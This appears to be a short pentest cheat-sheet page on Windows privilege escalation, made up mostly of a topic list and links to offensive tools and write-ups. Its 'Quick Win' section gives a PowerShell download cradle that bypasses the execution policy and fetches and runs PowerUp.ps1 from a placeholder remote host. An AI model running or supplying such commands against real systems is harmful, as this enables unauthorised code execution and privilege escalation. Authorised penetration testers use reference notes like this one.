Privilege escalation

• Patches Detection
• Services and Processes
• Registry
• Schedules Tasks
• Startup Applications
• Password mining
• Change user / Impersonation
• Admin2System
• Exploits
• Privilege abuse

Quick Win

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://<ip>/PowerUp.ps1'); Invoke-AllChecks | Out-File -Encoding ASCII checks.txt"

https://github.com/GhostPack/SharpUp
Port of various PowerUp functionality. Not all checks are ported yet, and no weaponization yet.

SharpUp.exe

https://github.com/rasta-mouse/Watson

Watson.exe

Enum https://rt.piosky.fr/enumeration/windows/

Tools

Check tools for latest updates and AV detection

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc 
https://github.com/1N3/PrivEsc
https://github.com/azmatt/windowsEnum
https://github.com/AlessandroZ/BeRoot
https://github.com/fireeye/SessionGopher
https://github.com/pentestmonkey/windows-privesc-check

Ressources

https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
http://www.greyhathacker.net/?p=738
https://foxglovesecurity.com/2016/01/16/hot-potato/
http://virgil-cj.blogspot.com/2018/02/escalation-time.html
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/